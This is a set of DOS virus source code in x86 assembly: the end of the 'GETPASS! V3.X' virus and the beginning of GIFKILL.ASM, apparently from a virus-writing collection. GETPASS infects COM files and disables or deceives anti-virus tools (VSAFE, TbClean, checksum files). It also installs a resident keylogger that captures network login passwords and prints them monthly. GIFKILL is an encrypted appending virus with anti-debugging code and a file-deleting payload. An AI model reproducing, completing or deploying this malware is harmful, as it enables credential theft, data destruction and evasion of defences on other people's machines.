EXIT1: MOV AH,1Ah ;Restore old DTA.
MOV DX,[BP+OFFSET OLD_DTA] ;Old DTA address.
INT 21h ;Call DOS.
EXIT2: MOV AH,0Eh ;Restore startup drive.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Old drive code.
INT 21h ;Call DOS.
MOV AH,3Bh ;Goto startup directory,
LEA DX,[BP+OFFSET BUFFER] ;that is stored here.
INT 21h ;Call DOS.
EXIT3: CALL RINT24 ;Restore original INT 24
EXIT4: MOV AX,100h ;
PUSH AX ;
RET ;Pass control to HOST.
;-----------------------------------------------------------------------------
DUMEX: MOV DI,0100h ;This is a dummy exit, it screws up
LEA SI,[BP+DEXIT] ;TbClean. In stead of cleaning the
MOV CX,3 ;phile, it puts a program terminating
REPNZ MOVSB ;interrupt in the beginning of the
MOV AX,0100h ;victim, neat huh!
PUSH AX ;
RET ;
;-----------------------------------------------------------------------------
BETWEEN:MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
JMP LETSGO ;Find next file.
CHKINF: MOV AX,3D00h ;Open file with only read acces.
MOV DX,WORD PTR[BP+OFFSET NP];Offset filename.
INT 21h ;Call DOS.
MOV BX,AX ;File handle into BX.
MOV CX,0FFFFh ;- Move -3 into CX,DX.
MOV DX,0FFFCh ;/
MOV AX,4202h ;Move file pointer to end-3
INT 21h ;Call DOS.
MOV AH,3Fh ;Read file.
MOV CX,01h ;One Byte.
LEA DX,[BP+OFFSET MARK1] ;Into this address.
INT 21h ;Call DOS.
CMP BYTE PTR [BP+OFFSET MARK1],43h; Is it infected?
JE BETWEEN ;Yes, find another.
CALL BPOINT ;Go to EOF.
CMP AX,MAXLEN ;Is the file to long?
JNB BETWEEN ;Yes, find another.
CMP AX,MINLEN ;Is it to short?
JBE BETWEEN ;Yes, find another.
MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDRV: CALL CHKDOS ;Check DOS version.
CMP AL,01 ;
JB DUMEX ;Screw up TbClean.
CMP AL,05h ;Is it DOS 5.0 or higher?
JNGE EXIT4 ;No, exit.
MOV AH,19h ;Get drive code.
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET OLDRV],AL;Save old drive code.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RESBEG: LEA SI,[BP+OFFSET ORIGNL] ;Offset original begin.
MOV DI,0100h ;Restore original instructions.
MOV CX,3 ;Restore 3 bytes.
REPNZ MOVSB ;Move them.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKCOM: MOV CX,05 ;CX=len COMMAND.
MOV DI,[BP+OFFSET NP] ;Offset found file.
LEA SI,[BP+OFFSET COMMND] ;Offset COMMAND.
REPZ CMPSB ;Compare the strings.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME: MOV CX,0Ch ; This section renames the
MOV SI,WORD PTR[BP+OFFSET NP]; found and approved for
LEA DI,WORD PTR[BP+OFFSET NEWNAM]; infection file to a
REPNZ MOVSB ; *.TXT file. The reason for
LEA BX,WORD PTR[BP+OFFSET NEWNAM-1];this is that VPROTECT from
LPOINT: INC BX ; Intel has a rule based NLM.
CMP BYTE PTR[BX],'.' ; If we write to a COM file
JNE LPOINT ; VPROTECT gives an alarm
MOV DI,BX ; message. However, if we
MOV WORD PTR[BP+OFFSET TXTPOI],BX; write to a text file....
LEA SI,[BP+OFFSET TXT] ; Pretty solution isn't it?
MOVSW ;
MOVSW ;
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME2:LEA SI,[BP+OFFSET SPEC+1] ; In this section we
MOV DI,WORD PTR[BP+OFFSET TXTPOI]; give the infected file
MOVSW ; its old extention back.
MOVSW ; (*.COM)
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ENKEY: CALL CHKTIME ;Get time.
MOV BYTE PTR[BP+OFFSET VAL_1],DL;New encryption key.
RET ;Return to caller.
;-----------------------------------------------------------------------------
SAVEDIR:MOV BYTE PTR[BP+OFFSET BUFFER],5Ch;Put a slash in DTA.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Drive code.
INC DL ;DL+1 because functions differ.
MOV AH,47h ;Get current directory.
LEA SI,[BP+OFFSET BUFFER+1] ;Store current directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
DTA: MOV AH,2Fh ;Get DTA address.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET OLD_DTA],BX; Save here.
LEA DX,[BP+OFFSET NEW_DTA] ;Offset new DTA address.
MOV AH,1Ah ;Give up new DTA.
INT 21 ;Call DOS.
ADD DX,1Eh ;Filename pointer in DTA.
MOV WORD PTR[BP+OFFSET NP],DX;Put in name pointer.
RET ;Return to caller.
;-----------------------------------------------------------------------------
INT24: MOV AX,3524h ;Get int 24 handler.
INT 21h ;into [ES:BX].
MOV WORD PTR[BP+OLDINT],BX ;Save it.
MOV WORD PTR[BP+OLDINT+2],ES;
MOV AH,25h ;Set new int 24 handler.
LEA DX,[BP+OFFSET NEWINT] ;DS:DX->new handler.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RINT24: PUSH DS ;Save data segment.
MOV AX,2524h ;Restore int 24 handler
LDS DX,[BP+OFFSET OLDINT] ;to original.
INT 21h ;Call DOS.
POP DS ;Restore data segment.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VSAFE: MOV AX,3516h ;Get interrupt vector INT 16.
INT 21h ;(Now we know in wich segment it is.)
MOV WORD PTR[BP+OFFSET NINT16],BX; - Store old INT 16 in TSR.
MOV WORD PTR[BP+OFFSET NINT16+2],ES;/
ADD BX,0364h ;Here we find a jump that w'ill change.
CMP WORD PTR[ES:BX],0945h ;Is it THE jump?
JNE OK_9 ;No, already modified or not resident.
MOV WORD PTR[ES:BX],086Dh ;Yes, modify it.
OK_9: RET ;Return to caller. No Vsafe.
;-----------------------------------------------------------------------------
FIND1: MOV BYTE PTR[BP+OFFSET VAL_2],0FFh; This routine is derivied from
MOV BX,01h ; the VIENNA virus.
FIND2: PUSH ES ;- Save registers.
PUSH DS ;/
MOV ES,DS:2CH ;
MOV DI,0 ;ES:DI points to environment.
FPATH: LEA SI,[BP+OFFSET PATH] ;Point to "PATH=" string in data area.
LODSB ;
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long.
REPNZ SCASB ;Search for first character.
MOV CX,4 ;Check if path
LOOP_2: LODSB ;is complete.
SCASB ;
JNZ FPATH ;If not all there, abort & start over.
LOOP LOOP_2 ;Loop to check the next character.
XCHG SI,DI ;Exchange registers.
MOV CL,BYTE PTR[BP+OFFSET VAL_2];Random value in CL.
PUSH ES ;\
POP DS ;-) Get DS, ES on address.
POP ES ;/
OK_14: LEA DI,[BP+OFFSET NEW_DTA+50];Offset address path.
OK_10: MOVSB ;Get name in path.
MOV AL,[SI] ;
CMP AL,0 ;Is it at the end?
JE OK_11 ;Yes, replicate.
CMP AL,3Bh ;Is it ';'?
JNE OK_10 ;Nope, next letter.
INC SI ;For next loop. ';'=';'+1.
INC BX ;
LOOP OK_14 ;Loop until random value = 0.
OK_11: POP DS ;Restore data segment.
MOV AL,0 ;Place space after the directory.
MOV [DI],AL ;
RET ;Return to caller.
;-----------------------------------------------------------------------------
DELSTUF:MOV BX,01h ;Set counter
PUSH BX ;and push it.
LEA DX,[BP+OFFSET MICRO] ;Is there a CHKLIST.MS file?
JMP INTER ;Check it out.
SECOND: LEA DX,[BP+OFFSET TBAV] ;Is there a ANTI-VIR.DAT file?
INC BX ;Increase counter
PUSH BX ;and push it.
JMP INTER ;Check it out.
THIRD: LEA DX,[BP+OFFSET CENTRAL] ;Is there a CHKLIST.CPS file?
INC BX ;Increase counter
PUSH BX ;and push it
INTER: MOV AH,4Eh ;Find first matching entry.
MOV CX,110b ;Search all attributes.
INT 21h ;Call DOS.
JC NODEL ;No match, find next.
CALL ATTRIB ;Clear attributes.
MOV AH,41h ;Delete file.
INT 21h ;Call DOS.
NODEL: POP BX ;Pop counter.
CMP BX,01 ;Had the first one?
JE SECOND ;Yes, do the second.
CMP BX,02 ;Was it the second?
JE THIRD ;Yes, do the third.
RET ;Finished, return to caller.
;-----------------------------------------------------------------------------
CHDRIVE:MOV CX,0FFFFh ;Clear CX.
MOV BL,'A'-1 ;AH=40
OK_15: INC BL ;AH=41='A'
INC CX ;CX=1
CMP BL,BYTE PTR[BP+OFFSET NEW_DTA+50];New drive letter.
JNE OK_15 ;Not the same, go again.
MOV DL,CL ;Calculated the new drive code.
MOV AH,0Eh ;Give up new drive code.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RTIME: MOV AX,5701h ;Restore time & date.
MOV CX,WORD PTR[BP+OFFSET TIME];Old time.
MOV DX,WORD PTR[BP+OFFSET DATE];Old date.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
STIME: MOV AX,5700h ;Get file date & time.
MOV BX,[BP+OFFSET HANDLE] ;File Handle.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET TIME],CX;Store time.
MOV WORD PTR[BP+OFFSET DATE],DX;Store date.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BPOINT: XOR DX,DX ;Zero register.
MOV AX,4202h ;Move file pointer to top.
XOR CX,CX ;Zero register.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ACTIVE: PUSH DS ;Save register.
INT 17h ;Check for NETX.
CMP AH,01h ;NETX resident?
JNE RESID ;Nope, do not install TSR.
CALL CREATE ;If not exsists, create password file.
CALL TIMER ;Time to print the password file?
MOV AX,3D3Dh ;Do resident check.
INT 21h ;Call BIOS.
CMP AX,1111h ;Already resident?
JE RESID ;If so, exit.
MOV AX,0044h ;Move code into hole in system
MOV ES,AX ;memory.
MOV DI,0100h ;ES:BX = 0044:0100
LEA SI,[BP+OFFSET TSR] ;Begin here
MOV CX,TSRLEN ;and this many bytes.
REP MOVSB ;Do it.
MOV DS,CX ;Get original INT 21 vector
MOV SI,0084h ;DS:SI = 0000:0084
MOV DI,0100h+NINTOF ;Store it in TSR
MOVSW ;One word,
MOVSW ;and another.
PUSH ES ;Restore register.
POP DS ;Restore register
MOV AX,2521h ;Give up new INT 21 vector.
MOV DX,0100h+INTOF ;Offset new INT 21.
INT 21h ;Call DOS.
MOV AX,2516h ;Give up new INT 16 vector.
MOV DX,0100h+INT16L ;Offset new INT 16.
INT 21h ;Call DOS.
RESID: POP DS ;- Restore register.
RET ;Return to caller.
;-----------------------------------------------------------------------------
TSR: DB 0 ; This is THE cool part!
;-----------------------------------------------------------------------------
INT21: CMP AX,4B00h ;Execute?
JE OK_16 ;Yep, do IT !
CMP AX,3D3Dh ;Resident check?
JNE DO_OLDI ;Nope, do original INT 21.
MOV AX,1111h ;Give up resident FLAG.
IRET ;Return to viral code.
DO_OLDI:JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
OK_16: PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV SI,0 ;
MOV BX,DX ;Name pointer into BX.
HERE: CMP BYTE PTR[BX],'.' ;Is it a point?
JE FOLLOW ;Yes, collected the name, cont.
INC BX ;BX+1
JMP HERE ;Get next character.
FOLLOW: SUB BX,05h ;Because LOGIN is 5 characters.
THERE: MOV AL,BYTE PTR [CS:0100+LOGINL+SI];Char into AL.
CMP BYTE PTR[BX+SI],'.' ;Did we make it until the point?
JE GETPASS ;It is LOGIN, get the password!
XOR AL,DS:[BX+SI] ;(XOR LOGIN,LOGIN)
JZ FOLLOW1 ;If XOR = 0 we have an equal char.
JMP ISNOT ;If not, well execute and do nothing.
FOLLOW1:INC SI ;Next char.
JMP THERE ;And compare again. (we must be shure.)
ISNOT: JMP ENDPARS ;Return to caller.
LOGIN DB 'LOGIN',0 ;Used to compare.
KBFLAG DB 0 ;Keyboard interrupt activation flag.
FNAME DB 'C:\DOS\MSD.INI',0 ;Password file specification.
KEYPTR DW 0 ;Keyboard pointer.
CCOUNT DB 0 ;\
CRETURN DB 0 ;/ Carriage return counter.
;-----------------------------------------------------------------------------
GETPASS:MOV BYTE PTR[CS:0100+KFLAG],0FFh;Set interrupt 16 flag.
POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV DS,ES:[BX+04] ;\ Get param.pointer ES:SI
MOV SI,ES:[BX+02] ;/
PUSH CS ; \
POP ES ; ) Get keybuff pointer DS:DI
MOV DI,OFFSET[CS:0100+KBUFF]; /
XOR CX,CX ;
MOV CL,BYTE PTR DS:[SI] ;CX IS PARAM.LEN.
INC SI ;
INC SI ;
CMP CL,10h ;
JG ENDPARS ;
CMP CL,00h ;No parameters.
JE BRANCH ;
MOV BYTE PTR[CS:0100+COUCR],01h;
ENDFD: INC CX ;
MOV WORD PTR[CS:0100+KPTR],CX;Set keyb.index op len param.
DEC CX ;
REPNZ MOVSB ;
MOV BYTE PTR ES:[DI-1],CR ;
MOV BYTE PTR ES:[DI],LF ;
JMP ENDPARS ;
BRANCH: MOV BYTE PTR[CS:0100+COUCR],02h;
ENDPARS:POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
MOV AX,4B00h ;
JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
PARAM DB 0 ;
;-----------------------------------------------------------------------------
INT16: CMP BYTE PTR[CS:0100+KFLAG],0FFh;Is it login.?
JE NEXTCHK ; Yes! Get the password!
THE_END:JMP DWORD PTR[CS:0100+OLD16L];Nope, do old INT 16.
NEXTCHK:CMP AH,00h ; Keyboard funtion call?
JE TAKCHAR ; Yes, continue.
CMP AH,10h ; Keyboard function call?
JNE THE_END ;
TAKCHAR:PUSHF ;Push flag register.
CALL DWORD PTR[CS:0100+OLD16L];Call old INT 16.
PUSH DS ;\
PUSH CS ; \
POP DS ; \
PUSH AX ; ) Save regs and set DS
PUSH BX ; /
PUSH CX ; /
PUSH DX ;/
CMP AL,00H ; No key typed
JE RESREGS ;
MOV BX,WORD PTR[CS:0100+KPTR]; Keybuf index
CMP BX,001Bh ; Max. length of kbuff.
JGE RESREGS ; End int16
CMP AL,CR ; If key = <Return>
JE COUNTCR ;
BACK: MOV BYTE PTR[CS:0100+KBUFF+BX],AL; Copy char into KBuffer
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
RESREGS:POP DX ;\
POP CX ; \
POP BX ; ) Restore regs.
POP AX ; /
POP DS ;/
IRET ; Return
COUNTCR:MOV AL,LF ;Line feed into AL.
DEC BYTE PTR[CS:0100+COUCR] ;Decrease CR counter.
CMP BYTE PTR[CS:0100+COUCR],00h;Is it zero?
JE OVER_2 ;Nope, continue logging.
MOV BYTE PTR[CS:0100+KBUFF+BX],CR; Copy char into KBuffer
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
MOV AL,LF ;
JMP BACK ;
OVER_2: MOV AL,CR ;CR into AL.
MOV BYTE PTR[CS:0100+KBUFF+BX],AL;Copy CR into KBuffer.
INC BX ;Increase buffercounter.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer.
INC BX ;Increase buffercounter.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer.
CALL WFILE ;Write buffer to the logfile.
MOV BYTE PTR[CS:0100+KFLAG],00h;
MOV WORD PTR[CS:0100+KPTR],00h;
JMP RESREGS ;Restore registers.
WFILE: PUSH AX ;\
PUSH BX ;
PUSH DX ; Save registers.
PUSH CX ;
PUSH DS ;/
PUSH CS ;\ Get Data segment on address.
POP DS ;/
MOV AX,3D02h ;Open file function.
MOV DX,OFFSET[CS:0100+FN] ;Offset file spec.
INT 21h ;Call DOS.
JC FAILURE ;On error, quit.
XCHG BX,AX ;Into BX.
MOV AX,4202h ;Mov file handle to EOF.
XOR CX,CX ;CX=0
XOR DX,DX ;DX=0
INT 21h ;Call DOS.
CMP AX,2000h ;File on max lenght?
JGE FAILURE ;If so, exit.
WRITE: MOV CX,CS:[0100+KPTR] ;BX = keyboard pointer.
ADD CX,03h ;+3.
MOV DX,OFFSET CS:[0100+KBUFF];Offset keyboard buffer.
MOV AH,40h ;Write to file function.
INT 21h ;Call DOS.
FCLOSE: MOV AH,3Eh ;Close file funtion.
INT 21h ;Call DOS.
FAILURE:POP DS ;\
POP DX ;
POP CX ; Restore registers.
POP BX ;
POP AX ;/
RET ;Return to caller.
;-----------------------------------------------------------------------------
NINT21: DW 0 ;- Original INT 21 vector.
DW 0 ;/
NINT16: DW 0 ;- Original INT 16 vector.
DW 0 ;/
KEYBUFF DB 1dh DUP (?) ;Keyboard buffer.
LASTBYT:DB 0 ;Last Resident Byte.
;-----------------------------------------------------------------------------
ATTRIB: MOV DX,WORD PTR[BP+OFFSET NP];Offset in DTA.
MOV AX,4300h ;Ask file attributes.
INT 21h ;Call DOS.
LEA BX,[BP+OFFSET ATTR] ;Save address for old attributes.
MOV [BX],CX ;Save it.
XOR CX,CX ;Clear file attributes.
MOV AX,4301h ;Write file attributes.
INT 21h ;Call DOS.
JNC OK ;No error, proceed.
CALL EXIT ;Oh Oh, error occured. Quit.
OK: RET ;Return to caller.
;-----------------------------------------------------------------------------
RATTRIB:LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
LEA BX,[BP+OFFSET ATTR] ;Offset address old attributes.
MOV CX,[BX] ;Into CX.
MOV AX,4301h ;Write old values back.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
GODIR: LEA DX,[BP+OFFSET NEW_DTA+52];Offset directory spec.
MOV AH,3Bh ;Goto the directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RANDOM: CALL CHKTIME ;Get system time.
MOV CX,0 ;Figure this out by yourself.
MOV AX,100d ;It is a random generator with
OK_19: INC CX ;two variable inputs.
SUB AX,BX ;A: How many dir's in the path.
CMP AX,01d ;B: Random system time. (jiffies)
JGE OK_19 ;With this values, we create a
XOR BX,BX ;random value between 1 and A.
OK_20: INC BX ;
SUB DL,CL ;
CMP DL,01d ;
JGE OK_20 ;
MOV BYTE PTR[BP+OFFSET VAL_2],BL;Save value.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BEGIN1: PUSH SP ;
POP BX ;Everything is related to BP.
MOV BP,WORD PTR[BX] ;
SUB BP,10Fh ;In first run BP=0
RET ;
;-----------------------------------------------------------------------------
NEWINT: MOV AL,03h ;New INT 24.
IRET ;No more write protect errors!
;-----------------------------------------------------------------------------
TIMER: PUSH DS ;Save data segment.
MOV AX,0044h ;\
MOV DS,AX ;- DS=resident segment.
CMP BYTE PTR[DS:0100],01h ;Already printed the file?
POP DS ;Restore data segment.
JE NOPRINT ;Yes, once is enough.
MOV AH,2Ah ;Get system date.
INT 21h ;Call DOS.
CMP DL,01h ;Is it the 1st of the month?
JNE NOPRINT ;Nope, don't print the passwords.
MOV AX,3D01h ;Open device PRN (printer)
LEA DX,[BP+OFFSET PRINT] ;Offset spec.
INT 21h ;Call DOS.
MOV DI,AX ;Save handle.
MOV AX,3D00h ;Open Password file.
LEA DX,[BP+OFFSET FNAME] ;File spec.
INT 21h ;Call DOS.
MOV SI,AX ;Save handle.
GOPRINT:MOV AH,3Fh ;Read file function.
MOV BX,SI ;File handle into BX.
MOV CX,01h ;Read one byte.
LEA DX,[BP+OFFSET OUTPUT] ;Into this address.
INT 21h ;Call DOS.
CMP AL,0 ;EOF?
JE READY ;If equal, ready.
MOV AH,40h ;Write to file function.
MOV BX,DI ;File handle into BX.
MOV CX,01h ;Write one byte.
LEA DX,[BP+OFFSET OUTPUT] ;Offset output.
INT 21h ;Call DOS.
JMP GOPRINT ;Next byte.
READY: MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
PUSH DS ;
MOV AX,0044h ;
mov DS,AX ;Restore data segment.
MOV BYTE PTR[DS:0100],01h ;Already printed the file?
POP DS ;
NOPRINT:RET ;Return to caller.
;-----------------------------------------------------------------------------
INSTSR2:LEA DI,[BP+OFFSET NEW_DTA+0100h];/
LEA SI,[BP+OFFSET INFECT] ;Offset address infection routine.
MOV CX,TSR2LEN ;Length to install.
REP MOVSB ;Install it.
MOV AX,25D0h ;Give up new INT D0 vector.
LEA DX,[BP+OFFSET NEW_DTA+0100h];
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
PRINT DB 'PRN',0 ;Device=printer.
PATH DB 'PATH=' ;Used to find environment.
SPEC DB '*.COM',0 ;File search specification.
TXT DB '.TXT',0 ;Rename file specification.
OUTPUT DB 0 ;Output byte to printer.
TXTPOI DW 0 ;Pointer in specification.
MARK1 DB 0 ;Used for infection check.
VAL_2 DB 0 ;Random value for directory switching.
OLDRV DB 0 ;Old drive code.
BYTES DB 'TBDRVX',0 ;
COMMND DB 'COMM',0 ;
MICRO DB 'CHKLIST.MS',0 ;- Files to be deleted.
CENTRAL DB 'CHKLIST.CPS',0 ;/
TBAV DB 'ANTI-VIR.DAT',0 ;/
VIRNAME DB 'GETPASS! V3.X',0 ;
BEGIN2 DW 0 ;
NWJMP1 DB 0EBh,0 ;
FLAGT DB 0 ;
OLD_DTA DW 0 ;Old DTA addres.
HANDLE DW 0 ;File handle.
TIME DB 2 DUP (?) ;File time.
DATE DB 2 DUP (?) ;File date.
ATTR DB 1 DUP (?),0 ;Attributes.
NEWJMP DB 0E9h,0,0 ;Jump replacement.
ORIGNL DB 0CDh,020h,090h ;Original instrucitons.
DEXIT DB 0CDh,020h,090h ;Dummy exit instructions.
NEWNAM DB 0Dh DUP (?) ;New file name.
OLDINT DW 0 ;Old INT 24 vector.
NP DW ? ;New DTA address.
;-----------------------------------------------------------------------------
INFECT: PUSH BX ;Save file handle.
PUSH DX ;Save encryption key.
PUSH BX ;Save file handle.
CALL ENCRYPT ;Encrypt the virus code.
POP BX ;Restore file handle.
LEA DX,[BP+OFFSET VSTART] ;Begin here.
MOV CX,VIRLEN ;Write this many Bytes.
MOV AH,40h ;Write to file.
INT 21h ;Call DOS.
POP DX ;Restore encryption value.
CALL ENCRYPT ;Fix up the mess.
POP BX ;Restore file handle.
DUMMY: IRET ;Return to caller.
;-----------------------------------------------------------------------------
CREATE: MOV AH,5Bh ;Create file function.
LEA DX,[BP+OFFSET FNAME] ;Offset file spec.
MOV CX,0 ;Normal attributes.
INT 21h ;Call DOS.
JC EXISTS ;File already excists, do the rest.
XCHG AX,BX ;File handle into BX.
MOV CX,INTRO ;Lenght of intro.
LEA DX,[BP+OFFSET INAME] ;Offset text.
MOV AH,40h ;Write to file function.
INT 21h ;Call DOS.
EXISTS: RET ;Return to caller.
INAME: DB 'You are now looking at the name/passwords of '
DB 'your network! ',CR,LF
DB 'Greetings, ThE wEiRd GeNiUs.',CR,LF
DB 'Check your MSD.INI once in a while!',CR,LF,CR,LF
LBIT: DB 0
;-----------------------------------------------------------------------------
;Comment: From here the code remains UN-encrypted.
;-----------------------------------------------------------------------------
CHKTIME:MOV AH,2Ch ;Get system time.
INT 21h ;Call DOS.
CMP DL,0 ;If zero,
JE CHKTIME ;try again.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDOS: MOV AH,30h ;Get DOS version.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VAL_1 DB 00h ;Encryption Value.
;-----------------------------------------------------------------------------
;Encrypting the virus code is not longer the most important thing to do since
;some of the anti-viral software can decrypt and trace the virus code in a
;simulated way. The en/de-cryption routine is almost the only piece of
;code that stays readable and if it is not a polymorphic virus this code
;always stays the same. The only way we can misguide a heuristic
;scanner is to 'tell' it that we are a normal, respectable program. By first
;performing a set of 'normal' instructions we mislead the scanner until it
;stops tracing the program. The result is that the en/decryption routine is
;not discovered. Since there are no other suspicious instructions in the code
;we remain under cover. This is why I used a very simple encryption method.
;-----------------------------------------------------------------------------
ENCRYP: CALL NEXTL ;-Get BP on address.
NEXTL: POP BX ;/
SUB BX,04 ;[BX]=decryption key.
MOV DL,[BX] ;DL=[BX]
SUB BX,LENGTH ;BX=begin of encrypted code.
CMP DL,0 ;Code Encrypted?
JE NOTENC ;Nope
JMP DECRYPT ;Decrypt.
ENCRYPT:LEA BX,[BP+OFFSET CSTART] ;De/en-crypt from here.
DECRYPT:MOV DH,DL ;
MOV CX,CRYPTLEN ;Set counter.
X_LOOP: XOR [BX],DL ;Xor the code on address BX.
SUB DL,DH ;-To change form of scrambled code.
SUB DH,02Eh ;/
INC BX ;Increase address.
LOOP X_LOOP ;Repeat until done.
NOTENC: RET ;Return to caller.
;-----------------------------------------------------------------------------
BUFFER: DB 64 DUP (?) ;Here we store directory info.
;-----------------------------------------------------------------------------
NEW_DTA: ;Here we put the DTA copy.
;-----------------------------------------------------------------------------
CODE ENDS
END START
;=============================================================================
@@ -0,0 +1,392 @@
; GIFKILL.ASM -- Seek and Destroy GIF
; Written by Dark Avenger
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
lea bx,[di + null_vector] ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov cx,0003h ; Do 3 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
call get_weekday
cmp ax,0005h ; Did the function return 5?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: lea dx,[di + data00] ; DX points to data
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; All file attributes valid
int 021h
jc erase_done ; Exit procedure on failure
mov ah,02Fh ; DOS get DTA function
int 021h
lea dx,[bx + 01Eh] ; DX points to filename in DTA
erase_loop: mov ah,041h ; DOS delete file function
int 021h
mov ah,03Ch ; DOS create file function
xor cx,cx ; No attributes for new file
int 021h
mov ah,041h ; DOS delete file function
int 021h
mov ah,04Fh ; DOS find next file function
int 021h
jnc erase_loop ; Repeat until no files left
erase_done:
end00:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
db 0FAh,045h,02Eh,0B3h,024h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
